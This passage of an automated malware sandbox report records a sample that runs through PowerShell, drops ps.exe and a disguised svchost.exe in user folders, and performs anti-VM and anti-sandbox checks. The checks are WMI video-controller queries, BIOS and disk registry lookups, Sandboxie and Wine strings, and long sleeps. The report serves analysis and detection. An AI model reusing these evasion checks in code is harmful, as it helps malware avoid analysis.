Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM_3

Source: Yara match	File source: 00000020.00000002.2179906707.0000000002601000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2157884372.0000000002671000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2192856956.0000000002661000.00000004.00000001.sdmp, type: MEMORY

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\mode.com	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\ps.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Roaming\svchost.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum name: 0
Source: C:\Users\user\AppData\Roaming\svchost.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Roaming\svchost.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Roaming\svchost.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2836	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2460	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1772	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2196	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1616	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2212	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe TID: 2436	Thread sleep time: -51103s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe TID: 260	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe TID: 260	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe TID: 884	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 1976	Thread sleep time: -49965s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2780	Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2780	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2312	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2772	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2232	Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2712	Thread sleep time: -54723s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 3028	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 3028	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2716	Thread sleep time: -922337203685477s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\AppData\Roaming\svchost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior

Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: q#"SOFTWARE\VMware, Inc.\VMware ToolsH
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: vmwareH
Source: powershell.exe, 0000000E.00000002.2115086772.00000000003B6000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: q&%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\H
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: VMWAREH
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIH
